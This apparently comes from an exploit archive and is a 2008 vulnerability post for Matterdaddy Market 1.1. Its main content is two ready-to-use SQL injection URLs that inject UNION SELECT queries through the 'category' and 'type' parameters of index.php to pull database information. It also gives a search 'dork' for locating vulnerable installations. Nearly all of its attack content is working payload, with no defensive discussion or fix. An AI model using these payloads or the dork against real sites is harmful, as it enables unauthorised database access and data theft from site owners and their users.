Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities
# Published : 2008-08-25
# Author : ~!Dok_tOR!~
# Previous Title : BtiTracker <= 1.4.7, xbtit <= 2.0.542 SQL Injection Vulnerability
# Next Title : Web Directory Script <= 2.0 (name) SQL Injection Vulnerability

Author: ~!Dok_tOR!~
Contact: coder5(at)topmail.kz 
Home Page: www.antichat.ru
Date found: 25.08.08
Product: Market
Version: 1.1
Download script: http://www.matterdaddy.com/4/scripts/market_v1_1.zip
Vulnerability Class: SQL Injection

magic_quotes_gpc = Off

http://localhost/[installdir]/

Exploit:

index.php?category='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*
index.php?type='+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13/*

Dork:

made by matterdaddy

# www.Syue.com [2008-08-25]